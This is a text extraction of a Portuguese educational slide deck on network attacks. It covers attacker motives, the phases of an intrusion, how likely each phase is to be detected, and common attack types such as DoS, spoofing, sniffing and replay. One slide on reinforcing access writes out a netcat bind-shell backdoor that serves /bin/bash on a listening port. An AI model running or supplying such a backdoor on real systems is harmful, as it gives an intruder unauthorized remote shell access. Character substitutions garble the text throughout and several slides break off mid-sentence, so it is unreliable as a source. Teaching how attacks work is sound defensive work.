Ataque a Rede

  • Upload
    acyron

  • View
    264

  • Download
    0

Embed Size (px)

Citation preview

  • 7/24/2019 Ataque a Rede

    1/43

    omputadores

  • 7/24/2019 Ataque a Rede

    2/43

    !

    nicialmente! se conscienti"ando###

    $ importante ter em mente os passos quecorrespondem a um ataque#

    %or&m! & importante sempre lem'rar que alguns invasores so mais inteligentes que a

    pessoa que implementou a segurana(

    que vrios invasores so imprevisveis( que a preveno eventualmente )al*a#

  • 7/24/2019 Ataque a Rede

    3/43

    "

    +uem pode invadir,

    %essoas com con*ecimento t&cnico# Atualmente! qualquer pessoa com acesso -

    nternet e interesse em aprender! pois possuem.

    acesso - sites de a/uda( acesso - scripts prontos(

    acesso - tutoriais de ataque#

    A nternet )ornece conte0do )acilitado e atuali"ado. ensinando a 'urlar os sistemas de segurana(

    permitindo que pessoas com pouco con*ecimentoataquem computadores com ou sem proteo#

  • 7/24/2019 Ataque a Rede

    4/43#

    1 que leva - invaso,

    Ato de desco'rir vulnera'ilidades no sistema! para simplesmente para divulgar a )al*a!

    ou para utili"ar o sistema!

    para gan*ar status! etc#

    Ato de dani)icar um sistema! por diverso!

    por concorrncia! etc#

    Ato de o'ter os dados importantes do sistema para utili"ao pr2pria!

    para terceiros! etc#

    1u simplesmente por pra"er###

  • 7/24/2019 Ataque a Rede

    5/43$

    1utros )atores que levam - invaso

    Espionagem industrial( %roveito pr2prio( ne3perincia(

    4ingana( Status ou 5ecessidade de Aceitao( Curiosidade e Aprendi"ado( 6usca de aventuras( 7aldade( Aca'ar com a corrupo( Diversos outros motivos###

  • 7/24/2019 Ataque a Rede

    6/43%

    Uma curiosidade###

    5a Filosofia Hacker! um atacante. deve estudar e o'ter o maior con*ecimento

    possvel!

    no pode )icar se e3i'indo! se ac*ando o tal! no deve cometer atitudes Lammer!

    deve dei3ar um sistema com sua )al*a para umapossvel utili"ao )utura#

  • 7/24/2019 Ataque a Rede

    7/43

    &

    8ipos de atacantes

    Curiosos. 9eralmente estudantes procurando diverso#

    n:*ouse. Funcionrios ou e3:)uncionrios de empresas#

    8&cnicos. 9ostam de criar programas e compartil*ar com os

    outros! possuem muito con*ecimento# %ro)issionais.

    Aqueles que rece'em pelo que )a"em#

  • 7/24/2019 Ataque a Rede

    8/43

    '

    1 atacante###

    1s passos de um atacante envolvem. ;econ*ecimento da rede(

    E3plorao da rede(

    1 re)oro( A consolidao dos planos(

    E o saque#

    Com esses passos o invasor pode tirarvantagem de uma vtima#

  • 7/24/2019 Ataque a Rede

    9/43

    (

    ;econ*ecimento

    %rocesso de. validar a conectividade!

    enumerar os servios e

    veri)icar por vulnera'ilidade de aplica

  • 7/24/2019 Ataque a Rede

    10/43

    )*

    E3plorao

    %rocesso de violao! que corrompe ou penetraos servios de um alvo#

    Alguns e3emplos de violao so.

    acessar o servidor por algum servio utili"ando umacesso legtimo ou no(

    criar uma e3ecuo de um servio no prevista porseus programadores(

    acessar um sistema! gan*ando privil&gios seminterromper o servio )ornecido#

  • 7/24/2019 Ataque a Rede

    11/43

    ))

    ;e)oro

    %rocesso onde o intruso aproveita o acessosem autori"ao! 4eri)ica )al*as e gan*a mais capacidades no alvo#

    9eralmente! instalam meios de comunicar como mundo e3terno# E3. backdoors: t0neis de acesso mais complicados de

    serem encontrados. servidor.py e cliente.py Servidor: nc -l -p porta -e /bin/bash

    Cliente: nc IP porta

  • 7/24/2019 Ataque a Rede

    12/43

    )!

    Consolidao

    %rocesso de comunicao do intruso ao alvocom um backdoor#

    = trs casos de sua consolidao.

    A'rir uma porta por onde um invasor pode seconectar ao programa do backdoor(

    Fa"er o programa do backdoorse conectar ao % doinvasor(

    Fa"er o programa do backdoorse conectar a umnternet ;ela> C*at ?;C@ para rece'er asinstru

  • 7/24/2019 Ataque a Rede

    13/43

    )"

    Saque

    Envolve. rou'ar in)orma

  • 7/24/2019 Ataque a Rede

    14/43

    )#

    A deteco do invasor

    5o recon*ecimento. a probabilidade de detec!o " de m"dia para alta.

    os atacantes devem e3ecutar servios de

    desco'erta durante um longo tempo! utili"andopadr

  • 7/24/2019 Ataque a Rede

    15/43

    )$

    A Deteco do nvasor

    5a e3plorao. a probabilidade de detec!o " alta.

    para e)etuar tentativas de acesso! os atacantes

    utili"am e#ploitsnos servios o)erecidos# Essas )erramentas no apresentam um tr)ego

    legtimo#

    %ode ser detectado por Sistemas de Deteco de

    ntrusos#

  • 7/24/2019 Ataque a Rede

    16/43

    )%

    A Deteco do nvasor

    5o re)oro. a probabilidade de detec!o " alta.

    as )erramentas utili"adas pelos atacantes para

    o'ter mais privil&gios ou para dis)arar a invasocausam uma atividade suspeita nos servidores#

    essa atividade pode ser )acilmente acompan*ada eidenti)icada#

  • 7/24/2019 Ataque a Rede

    17/43

    A Deteco do nvasor

    5a consolidao a probabilidade de detec!o " de bai#a para m"dia

    o atacante tem o controle total atrav&s da

    comunicao de sua mquina com a mquina alvo seus limites so impostos somente pelo controle de

    acesso e de tr)ego dos dispositivos da rede

    1 per)il do tr)ego & o 0nico que pode identi)icar

    padr

  • 7/24/2019 Ataque a Rede

    18/43

    A Deteco do nvasor

    5o saque a probabilidade de detec!o " de bai#a para m"dia

    o tr)ego do atacante vem de uma mquina de

    con)ianaB Uma )orma possvel para deteco

    con*ecer o tra'al*o dos sistemas internos detectar divergncias

  • 7/24/2019 Ataque a Rede

    19/43

    1 %rocesso de Segurana

  • 7/24/2019 Ataque a Rede

    20/43

    %rocesso de Segurana

    Segurana & um processo e no um estado# Envolve quatro passos

    de avaliao!

    de proteo! de deteco e

    de resposta ao ocorrido#

  • 7/24/2019 Ataque a Rede

    21/43

    Avaliao

    Envolve determinar medidas que possam garantir a pro'a'ilidadede sucesso ao de)ender uma empresa ou instituio#

    Deve:se de)inir Uma poltica de segurana

    1s servios que estaro disponveis em uma empresa

    Este passo de)ine como ser o tr)ego da instituio Se a poltica de)inida )or realmente rigorosa! qualquer outro tr)ego

    no con*ecido & um incidente na rede! sendo ou no um ataque 1s incidentes originam tam'&m de tentativas de usurios internos

    de escaparem das regras A equipe de gerncia de)ine como invaso ou somente violao da

    poltica %or&m! sempre se 'aseiam na poltica de segurana adotada

  • 7/24/2019 Ataque a Rede

    22/43

    %roteo

    $ a aplicao das medidas de)ensivas 4isa redu"ir a pro'a'ilidade de incidentes %ro'lema crtico na auditoria de tr)ego

    +uantidade de tr)ego que deve ser monitorada Deve:se redu"ir a quantidade de tr)ego ou as )ormas de

    acesso Assim! tem:se um tr)ego menor para monitorar e

    analisar

  • 7/24/2019 Ataque a Rede

    23/43

    Deteco

    $ o processo de identi)icar os intrusos coletando!

    identi)icando!

    validando e escalonando eventos suspeitos

    As invas

  • 7/24/2019 Ataque a Rede

    24/43

    Deteco

    ;equer quatro passos. Coletar. inspecionar e arma"enar in)orma

  • 7/24/2019 Ataque a Rede

    25/43

    Deteco : 4alidao

    1s eventos podem ser assimilados em uma dascategorias. acesso sem autori"ao como administrador

    acesso de usurio sem autori"ao tentativas de acesso sem autori"ao

    ataque de negao de servio com sucesso

    prtica de segurana ruim ou violao da poltica

    recon*ecimentoprovase3plora

  • 7/24/2019 Ataque a Rede

    26/43

    ;esposta

    $ o processo de validar os )rutos da deteco e

    tomar medidas para remediar as invas

  • 7/24/2019 Ataque a Rede

    27/43

    8ipos de Ataques

  • 7/24/2019 Ataque a Rede

    28/43

    Furto e que'ra de sen*as

    1 arquivo de sen*a rou'ado de um servidor &su'metido a que'ra por uma )erramenta decrac de sen*a#

    Assim & o'tido as sen*as dos usurios quetiveram seu servidor invadido# o*n 8*e ;ipper

  • 7/24/2019 Ataque a Rede

    29/43

    =omem do 7eio

  • 7/24/2019 Ataque a Rede

    30/43

    5egao de Servio ?DoS@

    So'recarga de um servidor com umaquantidade e3cessiva de solicita

  • 7/24/2019 Ataque a Rede

    31/43

    Engen*aria Social

    ...Se#ta feira as %&:'' da tarde o operador doCP( de )ma *rande empresa recebe )mtelefonema do +diretor financeiro+ solicitandos)a senha para trabalhar remotamente, o

    operador *entilmente fornece a informa!o e noo)tro dia vai descobrir )e foi en*anado.

    Este & um e3emplo do e3pediente usado para

    este tipo de ataque#

  • 7/24/2019 Ataque a Rede

    32/43

    Fal*as de Autenticao

    Um programa pede para e)etuar o loginUsername. marcia

    %assord. GGGGGGGG E3plorando )al*as!

    o programa de login pode ser atacado

    e pode )ornecer acesso sem nome eou sen*a

    #emplo com shell...

  • 7/24/2019 Ataque a Rede

    33/43

    Fal*as de %rotocolos

    Ataques DoS ?negao de servio@ ;einicia ou para o servio

    1u causa lentido

    Ataque HA5D Um invasor emite pacotes de requisio de cone3o

    com endereos %s de origem e destino

    S f

  • 7/24/2019 Ataque a Rede

    34/43

    Spoofin*

    Usar uma mquina para )a"er de conta que &outra

    %ode:se

    )or/ar o endereo de origem de um ou mais hosts atacar o D5S

    atacar como mquina do meio

    %ara reali"ar uma sesso 'em sucedida despoofin*! costuma:se matarB temporariamente amquina que est personi)icando

    #emplos....

    4 t d i )

  • 7/24/2019 Ataque a Rede

    35/43

    4a"amento de in)ormao

    1'tido atrav&s da resposta a consulta de %ing!

    8raceroute!

    8elnet! 5map!

    etc#

    n)orma

  • 7/24/2019 Ataque a Rede

    36/43

    ail 0omb

    7il*ares de mensagens enviadas a uma cai3apostal

    1 o'/etivo do atacante &

    apenas enviar li3o para a cai3a postal de algu&m e congestionar a via de acesso corporativo -

    nternet

    E3istem diversos programas que automati"amo mail bombin*

    C l d 8 i

  • 7/24/2019 Ataque a Rede

    37/43

    Cavalos de 8roia

    1 termo vem de uma passagem da lada de=omero! na qual os gregos deram de presenteum imenso cavalo de madeira a seus inimigos!os troianos! aparentemente como o)erta de uma

    proposta de pa"# %or analogia! *o/e na in)ormtica! o termo tro1an

    ou cavalo de troia& usado para designar uma

    categoria de programas destrutivosmascarados em programas e aplicativos

    S d ?P bi @

  • 7/24/2019 Ataque a Rede

    38/43

    Sondagem ?Probin*@

    Escanear a rede com scanners programas que 'uscam portas 8C% a'ertas por

    onde pode ser )eita uma invaso

    %ara evitar a deteco! alguns scannerstestam portas de um computador

    durante muitos dias em *orrios aleat2rios

    S )

  • 7/24/2019 Ataque a Rede

    39/43

    Smur)

    Um tipo de ataque de negao de servio Como )unciona

    1 agressor envia solicita

  • 7/24/2019 Ataque a Rede

    40/43

    Sniffin*

    %rograma ou dispositivo que captura o tr)egode rede So 0teis para gerenciamento de redes

    7as nas mos cracers permitem rou'arsen*as e outras in)orma

  • 7/24/2019 Ataque a Rede

    41/43

    %ing da 7orte

    $ o envio de um pacote % com taman*o maiorque o m3imo permitido ?JKKLK '>tes@ para amquina que se dese/a atacar

    1 pacote & enviado na )orma de )ragmentos equando a mquina destino tenta montar estes)ragmentos! in0meras situa

  • 7/24/2019 Ataque a Rede

    42/43

    Ataque de replay

    Forma particular de ataque em que parte de umatransmisso de rede & gravada e reprodu"idaposteriormente#

    5ormalmente! esse tipo de ataque est associado a

    uma criptogra)ia mal estruturada 1nde est o pro'lema

    credencial )or codi)icada sempre da mesma maneira(

    o atacante pode gravar a sequncia criptogra)ada

    e incorpor:la em uma transmisso reali"ada por ele mesmo Assim! sem sa'er a sen*a! seria possvel conseguir acesso

    ao sistema#

  • 7/24/2019 Ataque a Rede

    43/43